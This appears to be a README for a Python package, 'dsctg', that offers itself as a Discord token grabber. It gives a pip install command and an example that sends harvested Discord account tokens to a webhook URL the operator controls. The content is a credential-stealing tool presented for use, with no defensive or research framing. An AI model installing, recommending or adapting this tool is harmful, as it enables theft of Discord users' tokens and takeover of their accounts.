# Discord Token Grabber

Grab discord tokens and send it to your discord webhook

## Installation
```bash
pip install dsctg
```

## Example:
```py
import dsctg

# Your discord webhook url
webhook_url = 'https://discord.com/api/webhooks/61942069/y0U5uCk'

dsctg.webhook(webhook_url)

```
